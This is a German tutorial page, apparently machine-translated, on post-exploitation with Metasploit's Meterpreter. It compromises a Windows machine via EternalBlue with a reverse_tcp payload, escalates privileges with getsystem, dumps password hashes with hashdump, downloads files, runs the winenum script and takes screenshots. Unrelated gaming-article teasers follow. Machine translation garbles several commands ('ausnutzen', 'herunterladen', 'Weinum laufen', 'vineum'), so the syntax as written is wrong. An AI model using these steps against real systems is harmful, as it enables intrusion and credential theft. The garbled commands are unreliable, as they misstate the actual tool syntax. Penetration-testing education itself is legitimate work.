metasploit

Postausbeutung mit Meterpreter

Postausbeutung mit Meterpreter
Dies ist eine Einführung in das Meterpreter-Nutzlast-Plugin in Metasploit. In diesem kurzen Tutorial besprechen wir, wie Sie es verwenden, um ein WINDOWS OS-System nach der Ausnutzung anzuwenden, nachdem Sie es bereits mit dem Eternalblue-Exploit verletzt haben. Wir werden uns darauf beschränken, auf das Windows-System zuzugreifen und es zu erkunden, und alle Dinge, die wir tun werden, werden sich auf den Zugriff auf Informationen und Benutzeranmeldeinformationen konzentrieren.

Einführung in Meterpreter

Meterpreter ist eine Angriffsnutzlast im Metasploit-Framework, mit der der Täter den Computer des Opfers über eine Befehlsshell steuern und navigieren kann navigate. Es kann sich als sehr vielseitiges Werkzeug erweisen, wenn es um Penetrationstests geht.  Es ist ein Post-Exploitation-Tool, das auf In-Memory-DLL-Injektion basiert, d. h. es bringt die injizierte DLL zum Laufen, indem es einen neuen Prozess erstellt, der das System auffordert, die injizierte DLL auszuführen. Es kann Ihnen Zugriff auf eine unsichtbare Befehlsshell auf einem Opfercomputer geben, mit der Sie ausführbare Dateien ausführen und Netzwerke profilieren können.

Es wurde ursprünglich für Metasploit 2 geschrieben.x und wird für Metasploit 3 . aktualisiert.

Wir werden die Verwendung von Meterpreter im Detail besprechen, aber vorher noch ein Wort zu Nutzlasten im Allgemeinen haben

Was sind Nutzlasten?

Payloads in Metasploit sind Module, d. h. sie sind Code-Schnipsel in Metasploit, die auf dem von uns anvisierten Remote-System ausgeführt werden. Zuerst wird das Exploit-Modul gesendet, das das Payload-Modul auf dem System installiert. Dann gewährt die Nutzlast dem Angreifer Zugriff (eingeschränkt oder vollwertig, abhängig vom Inhalt der Nutzlast). Um die Funktionsweise von Nutzlasten näher zu erläutern, müssen wir deren Typen besprechen, die insgesamt 3 sind:

Einzel

Diese Nutzlasten sind vollständig in sich abgeschlossen, was bedeutet, dass sie so einfach wie Gatekeeper-Codes sein können, die dem Benutzer Zugang zu einem Zielsystem verschaffen.

Stager

Stager sind Nutzlasten, die Anwendungen innerhalb des Zielsystems sammeln und an den Angreifer senden. Es stellt die Verbindung zwischen dem Opfer und unserem lokalen Computer her.

Etappen

Sobald die Stager Zugriff auf das System haben, laden sie die Stage-Module herunter. Stages-Module entfernen die Größenbegrenzung am Meterpreter.

Beispiele für Stufen wären eine einfache Shell, iPhone 'ipwn' Shell, Meterpreter Module, VNC Injection V.

Sie können die Art der Nutzlast ermitteln, indem Sie ihren Namen ermitteln. Einzelne Nutzlasten haben normalerweise das Format /

Ausbeutung mit Meterpreter

Starten Sie zunächst die msf-Konsole, indem Sie den folgenden Terminalbefehl im Kali-Terminalfenster eingeben.

$ sudo msfconsole

Wir verwenden reverse_tcp als Stager und Meterpreter als Stage.

Wir beginnen mit der Einrichtung des Eternal Blue Exploits. Wählen Sie (ms17_010_eternalblue) und legen Sie dann windows/x64/meterpreter/reverse_tcp als ausgewählte Nutzlast fest

Konfigurieren Sie als Nächstes die Exploit-Einstellungen und führen Sie dann den Exploit mit dem Exploit-Befehl aus:

$ set payload windows/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ ausnutzen

Das Eternalblue-Exploit wurde erfolgreich aktiviert.

Postausbeutung

Wir greifen während der Nachausbeutung auf das bereits kompromittierte System zu und manipulieren es.

Wir können jetzt, da wir Zugriff auf das System haben, eine Menge Dinge tun, aber wie oben erwähnt, werden wir uns hauptsächlich darauf konzentrieren, Informationen herunterzuladen und Benutzeranmeldeinformationen zu erhalten

Zugriffsberechtigung verwalten:

Abhängig vom Nutzlastmodul und dem von Ihnen verwendeten Exploit können Sie mit bestimmten Zugriffsbeschränkungen konfrontiert sein, die Ihre Fähigkeiten zum Manövrieren des Opfercomputers stark beeinträchtigen. Sie können dieses Problem mit der Rechteausweitung umgehen, indem Sie Passwörter löschen und die Registrierungen manipulieren. Sie können die Berechtigungen auch mit dem get system -Befehl von Meterpreter eskalieren.

$ getsystem
$ Anleitung

Dateiübertragung mit Meterpreter

Mit Meterpreter können Sie eine Datei mit dem Befehl $download- herunterladen.

$ herunterladen /windows/system32/drivers/etc/hosts

Auf ähnliche Weise können Sie auch Informationen auf das Gerät hochladen, indem Sie den $upload-Befehl verwenden

Extrahieren von Benutzeranmeldeinformationen:

Verwenden Sie das Codeskript credential_collector, um Benutzerkonteninformationen zu extrahieren, oder verwenden Sie das Hash-Dump-Post-Modul mit ähnlichem Effekt.

Wir werden das Hash-Dump-Post-Modul verwenden, um mit dem Sammeln der Anmeldeinformationen fortzufahren. Geben Sie den folgenden msf-Befehl ein.

$ post/windows/gather/hashdump ausführen

Wie wir sehen, haben wir die Coen-, Gast- und Admin-Konten erhalten. Der LM-Hash (des Administrators) und der NTLM-Hash (der Gast) beziehen sich auf leere Passwörter, während der Coen-Hash ein Passwort ist, das Sie knacken müssen. Sie können dies tun, indem Sie einen Passwort-Cracker verwenden.

Automatisieren des System-Scrapings

Es kann mühsam sein, mit einzelnen Eingabeanweisungen Informationen zu sammeln, die Sie der Befehlsshell ständig füttern müssen. Praktischerweise können Sie diesen Vorgang mit vineum-script etwas automatisieren. Das Skript sammelt Informationen vom Opfer und lädt die Daten auf unseren lokalen Computer herunter. Sie erfahren, wo die Ausgabe gespeichert wird, wie Sie in der vierten Zeile von oben sehen können:

$ Weinum laufen

Denken Sie daran, dass der Pfad, in dem die Ausgabe für jeden Befehl gespeichert wird, von dem hier angezeigten abweichen kann.

Lass uns noch ein bisschen herumspielen

Ausführen von Dateien

Sie können jede Datei auf dem System ausführen, indem Sie Folgendes verwenden: execute -f . Dies umfasst sowohl ausführbare Dateien als auch Programme mit mehreren unterstützenden Dateien. Um beispielsweise die integrierte Taschenrechner-App im Windows-Betriebssystem auszuführen, geben Sie execute -f calc . ein.exe

Screenshots machen

Sie können auch Screenshots aus der Sicht des Benutzers aufnehmen. Geben Sie einfach screenshot in die Befehlsshell des Meterpreter ein, und Sie erhalten einen Screenshot der Anzeige auf dem System.

$ ausführen -f Calc.exe
$ Screenshot

Fazit:

Dies war eine kurze Einführung in das Meterpreter-Plugin im Metasploit-Framework, zusammen mit einer kurzen Anleitung, die seine grundlegendsten Anwendungen zeigt. Wir haben hier erfahren, wie wir mit dem Eternalblue-Exploit ein Windows-Betriebssystem knacken können, um Zugriff zu erhalten, und dann Meterpreter verwenden, um Berechtigungen zu eskalieren, Informationen manuell und mit dem automatisierenden vineus-Befehl zu sammeln. Wir haben auch gelernt, wie man Dateien auf dem Opfercomputer ausführt.

Meterpreter kann als ein nennenswertes Mittel zur Erkennung von Schwachstellen dienen, obwohl es sich um eine Ansammlung grundlegender Tools innerhalb des Metasploit-Frameworks handelt.

Beste Linux-Distributionen für Gaming im Jahr 2021
Das Linux-Betriebssystem hat sich weit von seinem ursprünglichen, einfachen, serverbasierten Aussehen entfernt. Dieses Betriebssystem hat sich in den ...
So erfassen und streamen Sie Ihre Gaming-Sitzung unter Linux
In der Vergangenheit galt das Spielen von Spielen nur als Hobby, aber mit der Zeit verzeichnete die Spieleindustrie ein enormes Wachstum in Bezug auf ...
Beste Spiele zum Spielen mit Handtracking
Oculus Quest hat kürzlich die großartige Idee des Hand-Trackings ohne Controller vorgestellt. Mit einer ständig steigenden Anzahl von Spielen und Akti...